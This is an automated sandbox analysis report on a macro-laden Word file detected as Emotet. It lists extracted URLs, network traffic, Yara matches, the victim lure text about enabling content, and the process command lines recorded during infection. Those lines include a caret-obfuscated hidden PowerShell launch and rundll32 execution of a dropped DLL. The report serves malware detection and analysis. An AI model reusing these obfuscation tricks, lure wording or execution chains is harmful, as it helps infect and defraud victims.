Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000011.00000002.308266582.000001E8C7442000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000011.00000002.308266582.000001E8C7442000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://directory.services.
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://dirtyindianporn.info/
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000011.00000002.308278437.000001E8C744E000.00000004.00000001.sdmp, svchost.exe, 00000011.00000003.307969498.000001E8C745A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000011.00000003.307923266.000001E8C745F000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000011.00000002.308260123.000001E8C743D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000011.00000003.286166612.000001E8C7432000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000004.00000002.289116018.0000018A15261000.00000004.00000001.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Raleway%3A100%2C200%2C300%2C400%2C500%2C600%2C700%2C800%2C90
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://freejavporn.mobi/
Source: powershell.exe, 00000004.00000002.281715020.0000018A14283000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://go-indian.pro/
Source: powershell.exe, 00000004.00000002.289836122.0000018A15796000.00000004.00000001.sdmp String found in binary or memory: https://go.micro
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://graph.windows.net
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://graph.windows.net/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://hindiporn.pro/
Source: powershell.exe, 00000004.00000002.289210434.0000018A15307000.00000004.00000001.sdmp String found in binary or memory: https://hotindianporn.mobi/
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 6CAFC0F8-7648-4F12-BE38-DAA8582ADD66.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 58.97.195.135:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.214.169.246:443 -> 192.168.2.3:49723 version: TLS 1.2

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 0000000D.00000002.284787283.00000000029E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.470768632.0000000003410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.470794872.0000000003431000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.284845000.00000000041B1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 14.2.rundll32.exe.3410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.3410000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29e0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.29e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.41b0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.3430000.3.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. End of document W Screen 1
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. End of document W Screen 1 of 1 O Type here to
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll
Very long command line found
Source: unknown Process created: Commandline size = 5389
Source: unknown Process created: Commandline size = 5293
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5293
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B6D9F 13_2_041B6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C6DB9 13_2_041C6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C7F1F 13_2_041C7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C0F0C 13_2_041C0F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C8F49 13_2_041C8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B8F78 13_2_041B8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B9FDC 13_2_041B9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C3FE7 13_2_041C3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C687F 13_2_041C687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C889D 13_2_041C889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B48BD 13_2_041B48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B88E5 13_2_041B88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B7998 13_2_041B7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BF98C 13_2_041BF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B69A0 13_2_041B69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C7A0F 13_2_041C7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B2A30 13_2_041B2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B9A37 13_2_041B9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B4A35 13_2_041B4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BEA4C 13_2_041BEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C5A61 13_2_041C5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C8ADC 13_2_041C8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C2B16 13_2_041C2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041BBB3A 13_2_041BBB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C9B45 13_2_041C9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041B5B79 13_2_041B5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C0B68 13_2_041C0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_041C1BDF 13_2_041C1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03444B41 14_2_03444B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03442349 14_2_03442349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343C769 14_2_0343C769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343E377 14_2_0343E377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03435B79 14_2_03435B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03447D03 14_2_03447D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03442B16 14_2_03442B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03448D1C 14_2_03448D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03438736 14_2_03438736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343F536 14_2_0343F536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343153C 14_2_0343153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03439FDC 14_2_03439FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034431E2 14_2_034431E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343F98C 14_2_0343F98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034473AC 14_2_034473AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03432C63 14_2_03432C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03445A61 14_2_03445A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343B41F 14_2_0343B41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034402C3 14_2_034402C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03431CFA 14_2_03431CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034360B9 14_2_034360B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03449B45 14_2_03449B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03448F49 14_2_03448F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03436754 14_2_03436754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343B75F 14_2_0343B75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03437B63 14_2_03437B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03440B68 14_2_03440B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03441773 14_2_03441773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03438F78 14_2_03438F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03440F0C 14_2_03440F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343B112 14_2_0343B112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03445D1D 14_2_03445D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03447F1F 14_2_03447F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344511B 14_2_0344511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03440D33 14_2_03440D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343BB3A 14_2_0343BB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034463C1 14_2_034463C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03441BDF 14_2_03441BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03443FE7 14_2_03443FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343D7EB 14_2_0343D7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034471EF 14_2_034471EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034467E9 14_2_034467E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03449586 14_2_03449586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344878F 14_2_0344878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03437998 14_2_03437998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03436D9F 14_2_03436D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343839D 14_2_0343839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034369A0 14_2_034369A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034317AC 14_2_034317AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034461B8 14_2_034461B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03446DB9 14_2_03446DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343F444 14_2_0343F444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343EA4C 14_2_0343EA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343E05A 14_2_0343E05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343EE78 14_2_0343EE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344687F 14_2_0344687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03447A0F 14_2_03447A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344340A 14_2_0344340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03432A30 14_2_03432A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03439A37 14_2_03439A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03434A35 14_2_03434A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034420C5 14_2_034420C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343C0C6 14_2_0343C0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034396CD 14_2_034396CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03448ADC 14_2_03448ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034442DA 14_2_034442DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034388E5 14_2_034388E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034412E2 14_2_034412E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034426F5 14_2_034426F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03431280 14_2_03431280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0343568E 14_2_0343568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03443895 14_2_03443895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344889D 14_2_0344889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034362A3 14_2_034362A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0344A0AF 14_2_0344A0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034380BA 14_2_034380BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_034348BD 14_2_034348BD
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: Informacion_29.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Ouz_y28f7ehnqn, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: Informacion_29.doc OLE indicator, VBA macros: true
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100040F0 appears 46 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10029D17 appears 32 times
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll
Yara signature match
Source: 00000004.00000002.289454945.0000018A154BB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000003.278200486.0000018A2C3D3000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.280486298.0000018A13D20000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.290625263.0000018A2C1D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289399769.0000018A15456000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.280124224.0000018A123D5000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289286993.0000018A153A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.290618766.0000018A2C1C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289171312.0000018A152BB000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289463456.0000018A154C9000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.289073167.0000018A15205000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: Q27V.dll.4.dr Static PE information: Section: .rsrc ZLIB complexity 0.995798093463
Source: classification engine Classification label: mal100.troj.evad.winDOC@24/17@5/9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_03431C88 CreateToolhelp32Snapshot, 14_2_03431C88
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7084:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\{335C5621-0832-4843-9FBC-E9AB4A592B32} - OProcSessId.dat
Source: Informacion_29.doc OLE indicator, Word Document stream: true
Source: Informacion_29.doc OLE document summary: title field not present or empty
Source: Informacion_29.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: Informacion_29.doc Virustotal: Detection: 62%
Source: Informacion_29.doc ReversingLabs: Detection: 79%
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 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
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll,Control_RunDLL
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ebern\dqxd.zpy',Control_RunDLL
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
